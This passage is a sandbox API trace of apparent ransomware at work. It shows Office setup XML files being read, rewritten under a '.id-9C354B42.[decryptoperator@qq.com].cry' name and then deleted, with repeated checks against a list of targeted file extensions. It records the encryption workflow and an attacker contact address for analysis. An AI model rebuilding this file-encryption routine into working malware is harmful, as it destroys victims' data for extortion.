Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0040.331] lstrlenW (lpString=".jpg") returned 4 [0040.331] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.332] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.332] lstrlenW (lpString="SETUP.XML") returned 9 [0040.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.332] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2362) returned 1 [0040.332] CloseHandle (hObject=0x1b8) returned 1 [0040.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20 [0040.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.332] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.332] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.333] GetLastError () returned 0x0 [0040.333] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x93a, lpOverlapped=0x0) returned 1 [0040.343] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x940, lpOverlapped=0x0) returned 1 [0040.344] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.344] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.344] SetEndOfFile (hFile=0x1c4) returned 1 [0040.344] CloseHandle (hObject=0x1c4) returned 1 [0040.345] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.345] SetEndOfFile (hFile=0x1b8) returned 1 [0040.345] CloseHandle (hObject=0x1b8) returned 1 [0040.345] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.346] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0040.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.346] lstrlenW (lpString=".doc") returned 4 [0040.346] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString=".docx") returned 5 [0040.346] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.346] lstrlenW (lpString=".pdf") returned 4 [0040.346] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString=".xls") returned 4 [0040.346] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString=".xlsx") returned 5 [0040.346] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.346] lstrlenW (lpString=".ppt") returned 4 [0040.346] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.346] lstrlenW (lpString=".zip") returned 4 [0040.346] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.346] lstrlenW (lpString=".rar") returned 4 [0040.346] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString=".bz2") returned 4 [0040.346] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.346] lstrlenW (lpString=".7z") returned 3 [0040.346] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.346] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.346] lstrlenW (lpString=".dbf") returned 4 [0040.347] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".1cd") returned 4 [0040.347] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".jpg") returned 4 [0040.347] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".doc") returned 4 [0040.347] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString=".docx") returned 5 [0040.347] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.347] lstrlenW (lpString=".pdf") returned 4 [0040.347] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString=".xls") returned 4 [0040.347] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString=".xlsx") returned 5 [0040.347] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.347] lstrlenW (lpString=".ppt") returned 4 [0040.347] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".zip") returned 4 [0040.347] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.347] lstrlenW (lpString=".rar") returned 4 [0040.347] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString=".bz2") returned 4 [0040.347] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString=".7z") returned 3 [0040.347] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".dbf") returned 4 [0040.347] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".1cd") returned 4 [0040.347] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0040.347] lstrlenW (lpString=".jpg") returned 4 [0040.348] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.348] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.348] lstrlenW (lpString="Office32WW.XML") returned 14 [0040.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.348] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=4274) returned 1 [0040.348] CloseHandle (hObject=0x1b8) returned 1 [0040.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20 [0040.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.348] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.348] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.348] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.349] GetLastError () returned 0x0 [0040.349] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0040.360] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0040.361] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.361] WriteFile (in: hFile=0x1c4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.361] SetEndOfFile (hFile=0x1c4) returned 1 [0040.361] CloseHandle (hObject=0x1c4) returned 1 [0040.362] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.362] SetEndOfFile (hFile=0x1b8) returned 1 [0040.362] CloseHandle (hObject=0x1b8) returned 1 [0040.362] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.363] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0040.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.363] lstrlenW (lpString=".doc") returned 4 [0040.363] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString=".docx") returned 5 [0040.363] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.363] lstrlenW (lpString=".pdf") returned 4 [0040.363] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString=".xls") returned 4 [0040.363] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString=".xlsx") returned 5 [0040.363] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.363] lstrlenW (lpString=".ppt") returned 4 [0040.363] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.363] lstrlenW (lpString=".zip") returned 4 [0040.363] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.363] lstrlenW (lpString=".rar") returned 4 [0040.363] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString=".bz2") returned 4 [0040.363] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.363] lstrlenW (lpString=".7z") returned 3 [0040.364] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".dbf") returned 4 [0040.364] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".1cd") returned 4 [0040.364] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".jpg") returned 4 [0040.364] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".doc") returned 4 [0040.364] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString=".docx") returned 5 [0040.364] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0040.364] lstrlenW (lpString=".pdf") returned 4 [0040.364] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString=".xls") returned 4 [0040.364] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString=".xlsx") returned 5 [0040.364] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0040.364] lstrlenW (lpString=".ppt") returned 4 [0040.364] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".zip") returned 4 [0040.364] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.364] lstrlenW (lpString=".rar") returned 4 [0040.364] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString=".bz2") returned 4 [0040.364] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString=".7z") returned 3 [0040.364] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.364] lstrlenW (lpString=".dbf") returned 4 [0040.364] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.365] lstrlenW (lpString=".1cd") returned 4 [0040.365] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0040.365] lstrlenW (lpString=".jpg") returned 4 [0040.365] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.365] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.365] lstrlenW (lpString="OneNoteMUI.XML") returned 14 [0040.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.365] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1606) returned 1 [0040.365] CloseHandle (hObject=0x1b8) returned 1 [0040.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20 [0040.365] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.365] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.365] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0040.726] GetLastError () returned 0x0 [0040.726] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x646, lpOverlapped=0x0) returned 1 [0040.742] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x650, lpOverlapped=0x0) returned 1 [0040.743] ReadFile (in: hFile=0x1b8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.743] WriteFile (in: hFile=0x178, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0040.743] SetEndOfFile (hFile=0x178) returned 1 [0040.743] CloseHandle (hObject=0x178) returned 1 [0040.744] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.744] SetEndOfFile (hFile=0x1b8) returned 1 [0040.745] CloseHandle (hObject=0x1b8) returned 1 [0040.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.745] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.745] lstrlenW (lpString=".doc") returned 4 [0040.745] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.745] lstrlenW (lpString=".docx") returned 5 [0040.745] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.745] lstrlenW (lpString=".pdf") returned 4 [0040.745] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.745] lstrlenW (lpString=".xls") returned 4 [0040.745] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".xlsx") returned 5 [0040.746] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.746] lstrlenW (lpString=".ppt") returned 4 [0040.746] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".zip") returned 4 [0040.746] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.746] lstrlenW (lpString=".rar") returned 4 [0040.746] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".bz2") returned 4 [0040.746] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".7z") returned 3 [0040.746] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".dbf") returned 4 [0040.746] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".1cd") returned 4 [0040.746] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".jpg") returned 4 [0040.746] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0040.746] lstrlenW (lpString=".doc") returned 4 [0040.746] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".docx") returned 5 [0040.746] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.746] lstrlenW (lpString=".pdf") returned 4 [0040.746] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".xls") returned 4 [0040.746] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.746] lstrlenW (lpString=".xlsx") returned 5 [0040.746] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.746] lstrlenW (lpString=".ppt") returned 4 [0040.746] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 